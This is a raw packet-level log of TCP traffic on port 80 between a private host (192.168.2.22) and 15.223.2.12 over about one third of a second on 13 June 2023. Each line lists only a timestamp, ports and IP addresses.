                                              Jun 13, 2023 11:01:19.442655087 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.442719936 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.442719936 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.442806959 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444475889 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444530964 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444581032 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444582939 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444607019 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444632053 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444664001 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444683075 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444715023 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444744110 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444744110 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444792032 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444833040 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444842100 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444854021 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444890022 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444926023 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444926023 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444936037 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.444955111 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.444983006 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445005894 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445017099 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445039988 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445063114 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445087910 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445112944 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445137024 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445158005 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445169926 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445204973 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445231915 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445251942 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445261955 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445300102 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445333004 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445347071 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445394993 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445419073 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445466042 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445473909 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445513010 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445538044 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445563078 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445590019 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445614100 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445616961 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445662022 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445696115 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445710897 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445736885 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445759058 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445806026 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445823908 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445847988 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445852995 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445883989 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445899963 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445935011 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445947886 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.445985079 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.445996046 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.446022034 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.446044922 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.447586060 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.448936939 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.548110008 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.548190117 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.548237085 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.548249006 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.548335075 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.548335075 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.548335075 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.548393965 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.548405886 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.548451900 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.548459053 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.548510075 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.548516035 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.548568964 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.548578978 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.548638105 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.551412106 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551474094 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551502943 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.551531076 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.551532030 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551594019 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551598072 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.551651955 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551656961 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.551708937 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551714897 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.551769972 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551785946 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.551826000 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.551826954 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551886082 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551893950 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.551942110 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.551953077 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552000046 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552006006 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552058935 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552063942 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552115917 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552120924 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552172899 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552186012 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552229881 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552239895 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552304029 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552304029 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552313089 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552372932 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552381992 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552443981 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552715063 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552772999 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552793980 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552833080 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.552900076 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.552900076 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.553107977 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554074049 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554141998 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554156065 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554200888 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554208994 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554259062 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554264069 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554317951 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554325104 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554374933 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554384947 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554434061 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554438114 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554496050 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554522991 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554553986 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554558992 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554615021 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554634094 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554672956 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554677963 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554730892 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554738998 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554784060 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554784060 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554790020 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554848909 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554851055 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554908037 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554913998 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.554964066 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.554970026 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.555021048 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.555025101 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.555077076 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.555082083 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.555134058 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.555136919 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.555191994 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.555196047 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.555249929 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.555252075 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.555309057 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.555313110 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.555372000 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.555618048 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.653956890 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.654056072 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.654119968 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.654187918 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.654247046 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.654288054 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.654288054 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.654305935 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.654356956 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.654356956 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.654367924 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.654388905 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.654427052 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.654448032 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.654508114 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.657388926 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.657459021 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.657510996 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.657521009 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.657537937 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.657582045 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.657609940 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.657646894 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.657670021 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.657737970 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.657829046 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.657912970 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.657953024 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658047915 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658097029 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658293009 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658354998 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658375978 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658416033 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658433914 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658473015 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658493996 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658530951 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658550978 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658592939 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658610106 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658678055 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658713102 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658772945 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658829927 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658832073 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658860922 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658889055 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658916950 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.658946037 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.658960104 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.659003973 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.659030914 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.659059048 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.659063101 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.659081936 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.659143925 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.659950972 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.660329103 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.660423040 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.660423994 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.660506010 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.660543919 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.660604954 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.660625935 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.660662889 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.660681009 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.660737991 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.660778999 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.660860062 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.660944939 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661005974 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661035061 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661063910 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661091089 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661119938 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661134958 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661178112 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661200047 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661236048 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661246061 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661313057 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661505938 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661565065 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661588907 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661623955 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661638975 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661683083 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661701918 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661741972 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661760092 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661780119 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661798954 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661814928 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661856890 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661880970 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661914110 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661927938 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.661972046 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.661998034 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.662029028 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.662055969 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.662107944 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.662714005 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.759783030 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.759860039 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.759893894 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.759926081 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.759946108 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.759988070 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.759990931 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760046959 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760104895 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760104895 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760107040 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760168076 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760169029 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760225058 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760229111 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760288954 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760304928 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760365009 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760379076 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760427952 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760432959 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760485888 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760488987 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760561943 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760562897 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760639906 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760648966 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760696888 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760705948 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760756016 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.760763884 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.760821104 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.762780905 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.762845993 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.762865067 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.762904882 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.762911081 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.762964964 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.762969971 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763024092 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763030052 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763086081 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763092041 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763147116 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763154030 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763207912 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763256073 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763273001 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763277054 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763330936 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763339043 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763387918 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763396025 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763452053 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763454914 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763515949 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763524055 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763575077 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.763627052 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.763647079 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.764153957 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.764199018 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.764225006 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.764271021 CEST4919080192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:01:19.764281988 CEST804919015.223.2.12192.168.2.22
                                              Jun 13, 2023 11:01:19.764353037 CEST4919080192.168.2.2215.223.2.12
